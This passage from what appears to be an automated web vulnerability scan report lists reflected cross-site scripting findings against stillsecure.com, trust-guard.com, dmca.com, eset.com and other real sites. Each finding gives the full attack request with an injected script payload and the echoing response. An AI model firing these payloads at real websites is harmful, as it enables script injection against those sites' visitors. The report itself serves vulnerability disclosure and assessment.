Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.9.10.1303732858
Content-Length: 168

firstName=&lastName=eb23d"><script>alert(1)</script>9630ad29cfd&company=&email=&phone=&stateProvince=Not+Applicable&comments=&contact=1&refUrl=&rfId=&leadSource=Contact+Form&campaignName=Contact+Us&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:42 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17178

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<input name="lastName" type="text" value="eb23d\"><script>alert(1)</script>9630ad29cfd">
...[SNIP]...

6.67. http://www.stillsecure.com/m/ [phone parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stillsecure.com
Path:	/m/

Issue detail

The value of the phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffb4b"><script>alert(1)</script>380c8aa2910 was submitted in the phone parameter. This input was echoed as ffb4b\"><script>alert(1)</script>380c8aa2910 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=contact-us
Cache-Control: max-age=0
Origin: http://www.stillsecure.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.9.10.1303732858
Content-Length: 168

firstName=&lastName=&company=&email=&phone=ffb4b"><script>alert(1)</script>380c8aa2910&stateProvince=Not+Applicable&comments=&contact=1&refUrl=&rfId=&leadSource=Contact+Form&campaignName=Contact+Us&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:52 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17138

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<input name="phone" type="text" value="ffb4b\"><script>alert(1)</script>380c8aa2910">
...[SNIP]...

6.68. http://www.trust-guard.com/Other/ImageResizer.php [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.trust-guard.com
Path:	/Other/ImageResizer.php

Issue detail

The value of the src request parameter is copied into the HTML document as plain text between tags. The payload 1c068<script>alert(1)</script>20c7cb0df31 was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Other/ImageResizer.php?src=http://www.trust-guard.com/Images/Testimonials/m5videoguide.gif1c068<script>alert(1)</script>20c7cb0df31&w=160&maxh=45 HTTP/1.1
Host: www.trust-guard.com
Proxy-Connection: keep-alive
Referer: http://www.trust-guard.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=53j8cu4bh6ab8gf50molua90i4; __utma=147269874.1166530582.1303748966.1303748966.1303758698.2; __utmc=147269874; __utmb=147269874.2.10.1303758698

Response

HTTP/1.1 400 Bad Request
Date: Mon, 25 Apr 2011 19:33:58 GMT
Server: Apache/2.2.3 (CentOS)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93

file not found /Images/Testimonials/m5videoguide.gif1c068<script>alert(1)</script>20c7cb0df31

6.69. https://hourly.deploy.com/hmc/report/Netsparkercdbd6412ae00461e9f79a262b2aa7b0f.cfm [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/Netsparkercdbd6412ae00461e9f79a262b2aa7b0f.cfm

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload c6f43<script>alert(1)</script>9d16581bbf9 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /hmc/report/Netsparkercdbd6412ae00461e9f79a262b2aa7b0f.cfm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)c6f43<script>alert(1)</script>9d16581bbf9
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Mon, 25 Apr 2011 13:41:34 GMT
Server: Apache/2.0.46 (Red Hat)
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:34 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

</TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)c6f43<script>alert(1)</script>9d16581bbf9</td>
...[SNIP]...

6.70. http://www.dmca.com/Protection/Status.aspx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.dmca.com
Path:	/Protection/Status.aspx

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload f5e30--><script>alert(1)</script>7527382c8aa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Protection/Status.aspx?id=6d6905a9-aeec-4426-921a-33dc8d0cdfb9&PAGE_ID=aHR0cDovL3d3dy5yZXB1dGF0aW9uY2hhbmdlci5jb20vc2NoZWR1bGVkLmh0bWw1 HTTP/1.1
Host: www.dmca.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=f5e30--><script>alert(1)</script>7527382c8aa
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wubflym5pb53bt45ku4n3oa4

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: whoson=320680-61842.144793; expires=Thu, 23-Jun-2011 23:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 16:10:41 GMT
Content-Length: 14278

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">

<head id="ctl00_mstrHead"><title>
Reputation Changer | Protected by DMCA Protecti
...[SNIP]...
<br />Referer is: http://www.google.com/search?hl=en&q=f5e30--><script>alert(1)</script>7527382c8aa
<br />
...[SNIP]...

6.71. http://www.eset.com/business/server-security/linux-file [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.eset.com
Path:	/business/server-security/linux-file

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 619e4"-alert(1)-"482a8458b9e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /business/server-security/linux-file HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=619e4"-alert(1)-"482a8458b9e
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.1.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738137976%3B%20gpv_pageName%3Dus/business/products%7C1303738137981%3B%20s_nr%3D1303736337984-Repeat%7C1335272337984%3B%20s_invisit%3Dtrue%7C1303738137988%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_sq%3D%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 17267
Date: Mon, 25 Apr 2011 12:59:24 GMT
X-Varnish: 1310979423
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>M
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Business";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=619e4"-alert(1)-"482a8458b9e";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

6.72. http://www.eset.com/us [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4087"-alert(1)-"8cebc1897b2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=check#true#1303736408|session#1303736347554-914602#1303738208|PC#1303736347554-914602.17#1304945949; __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738202515%3B%20gpv_pageName%3Dus/store%7C1303738202519%3B%20s_nr%3D1303736402523-Repeat%7C1335272402523%3B%20s_invisit%3Dtrue%7C1303738202525%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/store%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257BaddMboxValue%25252528%25252527ns_form_1%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DIMAGE%3B
Referer: http://www.google.com/search?hl=en&q=f4087"-alert(1)-"8cebc1897b2

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=3; expires=Fri, 24-Jun-2011 15:18:23 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26712
Date: Mon, 25 Apr 2011 15:18:23 GMT
X-Varnish: 555657802
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=f4087"-alert(1)-"8cebc1897b2";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

6.73. http://www.eset.com/us/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 631c6"-alert(1)-"5990df6aee9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/ HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=check#true#1303736408|session#1303736347554-914602#1303738208|PC#1303736347554-914602.17#1304945949; __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738202515%3B%20gpv_pageName%3Dus/store%7C1303738202519%3B%20s_nr%3D1303736402523-Repeat%7C1335272402523%3B%20s_invisit%3Dtrue%7C1303738202525%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/store%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257BaddMboxValue%25252528%25252527ns_form_1%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DIMAGE%3B
Referer: http://www.google.com/search?hl=en&q=631c6"-alert(1)-"5990df6aee9

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=4; expires=Fri, 24-Jun-2011 15:20:14 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26742
Date: Mon, 25 Apr 2011 15:20:14 GMT
X-Varnish: 555663552
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=631c6"-alert(1)-"5990df6aee9";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

6.74. http://www.eset.com/us/business/products [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us/business/products

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c73f"-alert(1)-"f9f42456929 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303732844.1.1.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303732844.1; __utmc=1; s_pers=%20s_visit%3D1%7C1303734644038%3B%20gpv_pageName%3Dus/business/products%7C1303734644042%3B%20s_nr%3D1303732844048-New%7C1335268844048%3B%20s_vnum%3D1335268844052%2526vn%253D1%7C1335268844052%3B%20s_invisit%3Dtrue%7C1303734644052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cpc%3D1%3B%20s_sq%3D%3B
Referer: http://www.google.com/search?hl=en&q=7c73f"-alert(1)-"f9f42456929

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 21125
Date: Mon, 25 Apr 2011 12:53:27 GMT
X-Varnish: 1310966651
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Business";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=7c73f"-alert(1)-"f9f42456929";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

6.75. http://www.eset.com/us/business/server-security/linux-file [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us/business/server-security/linux-file

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95bca"-alert(1)-"1b87eb369cb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/business/server-security/linux-file HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=95bca"-alert(1)-"1b87eb369cb
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.1.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738137976%3B%20gpv_pageName%3Dus/business/products%7C1303738137981%3B%20s_nr%3D1303736337984-Repeat%7C1335272337984%3B%20s_invisit%3Dtrue%7C1303738137988%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_sq%3D%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 17267
Date: Mon, 25 Apr 2011 12:59:23 GMT
X-Varnish: 1310979390
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>M
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Business";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=95bca"-alert(1)-"1b87eb369cb";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

6.76. http://www.eset.com/us/home/smart-security [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us/home/smart-security

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec105"-alert(1)-"6412896c31 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/home/smart-security HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=ec105"-alert(1)-"6412896c31
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
